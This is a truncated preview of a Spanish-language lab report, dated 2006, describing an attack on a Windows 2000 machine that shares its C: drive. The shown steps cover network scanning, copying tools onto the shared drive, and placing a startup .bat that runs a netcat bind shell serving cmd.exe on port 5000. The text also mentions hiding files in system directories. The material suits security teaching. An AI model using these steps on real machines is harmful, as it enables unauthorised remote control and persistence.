Laboratorio win2000

Solo disponible en BuenasTareas
  • Páginas : 6 (1449 palabras )
  • Descarga(s) : 0
  • Publicado : 10 de noviembre de 2011
Leer documento completo
Vista previa del texto
Como publicar una página Web aprovechando vulnerabilidades en Windows 2000
Mayo de 2006

Resumen

Por medio de este documento se pretende mostrar todo el proceso realizado en la planificación y ejecución de un ataque informático aprovechando vulnerabilidades encontradas en el sistema operativo Windows mediante diferentes herramientas y utilidades ya existentes.

Se da una descripción delfuncionamiento general de las aplicaciones así como el desarrollo y ejecución del ataque. De la misma manera se mencionan varias recomendaciones que se pueden tener en cuenta para evitar o contrarrestar este problema.

Palabras clave:
Vulnerabilidad, Windows 200, Ataque

1. Introducción

Uno de los grandes problemas de seguridad en una organización, donde por lo general se tienen redessobre plataforma Windows para las máquinas de los usuarios, es el control de las carpetas compartidas; Si no se cuenta con políticas claras de seguridad ni con controles automatizados de seguridad en cada una de las estaciones, se corre el riego de que los usuario, por desconocimiento o por negligencia publiquen unidades de disco completas o carpetas, esto representan un riesgo crítico para laseguridad tanto local como de la red..

Explicaremos mediante un ataque, sin necesidad de ser tan profundo, el alto riesgo que puede correr un usuario corporativo cuando no sabe qué recursos está compartiendo en la red; sobre todo, cuando se comparte el disco C:, por cuestiones de “facilidad”.

2. El Ataque

Nuestro ataque está enfocado a máquinas de usuarios corporativos, que utilizan Windows 2000Profesional, y se basa, en la combinación de las herramientas que fueron ya explicadas.

Aprovechamos el riego crítico que corren los usuarios corporativos, al compartir en la red el disco “C:” con todos los permisos.

A continuación, se hace la explicación secuencial del ataque.

2.1. Elegir la victima. Utilizando un scanner, se puede verificar que equipos existen y cuales presentanpuertos abiertos fácilmente explotables; para nuestro caso utilizamos LANGuard Network Scanner y encontramos un equipo con su unidad C: compartida, este es el equipo perfecto para el ataque.

2.2. Esquema de victima y agresor. El esquema de maquinas victima y agresor, es el siguiente:

|Agresor |Victima |
|[pic] |[pic]|
|Windows XP SP2 |Windows 2000 |
|IP: 192.168.242.1 |IP: 192.168.242.128 |
|Herramientas: |Vulnerabilidades: |
|LANGuard Scanner |Disco C: Compartido |
|NetCat |No tiene parches de |
|Debploit |seguridad. |
|DiegoMP3 Server | |

2.3. Procedimiento del ataque. Luego de haber encontrado un equipo victima ideal, se realiza el ataque de la siguiente forma:

• Se conecta unidad de red y se crea un directorio donde se descargará el software, para este caso y con fines didácticos se crea el directorio C:\NC, pero en la vida real el software se descarga en directorios delsistema o ya existentes para no despertar sospechas.
• Se copia el software que se utilizará para el ataque (este se describe mas adelante), en el directorio creado en el punto anterior y se copia un .bat en la ruta: C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio, para que en el momento de que cualquier usuario haga un logon en la máquina este se ejecute.
• Se habilita consolaremota, cuando un usuario se valida en la máquina, se ejecuta el archivo que está en la ruta descrita en el punto anterior y contiene lo siguiente:

c:\nc\nc.exe -L -d -e cmd.exe -p 5000

Este ejecuta el NetCat que queda escuchando en el puerto 5000 y permite tomar una consola remota desde el equipo agresor.

• Se toma una consola remota desde el equipo agresor con el siguiente comando:...
tracking img